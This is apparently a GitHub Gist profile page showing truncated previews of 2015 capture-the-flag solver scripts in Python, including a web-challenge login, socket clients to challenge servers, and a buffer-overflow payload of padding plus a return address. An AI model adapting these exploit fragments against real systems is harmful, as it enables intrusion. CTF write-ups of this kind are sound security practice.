Skip to content

Instantly share code, notes, and snippets.

View budanthara's full-sized avatar
🏠
Working from home

Ida Bagus Budanthara budanthara

🏠
Working from home
  • Indonesia
View GitHub Profile
import urllib, urllib2
import re
# CSAW CTF 2015 - Solving Lawn Care Simulator 2015 ( Web 200pts )
# To analyze the php syntax, just clone the git. http://54.165.252.74:8089/.git/
# snoww0lf
def login():
url = "http://54.165.252.74:8089/premium.php"
params = {
# IDSECCONF2015 CTF - Debugme ( Reversing 100pts )
# snoww0lf - Noobs1337
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('128.199.218.190', 15178))
data = ['0x6a', '0x6f', '0x6b', '0x6f', '0x6f', '0x6f', '0x21']
send_data = ''.join(data).replace("0x", "").decode("hex")
flag = ''
# IDSECCONF2015 CTF - Easy Exploit ( 100pts )
# snoww0lf - Noobs1337
import socket
sc = ""
sc += 'A'*136
sc += '\x16\x06\x40'
sc += '\x00'*10
# IDSECCONF2015 - IMFTest ( Misc 250pts )
# Solver by snoww0lf - Noobs1337
import socket
import re
import sys
import numpy as np
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('128.199.218.190', 17845))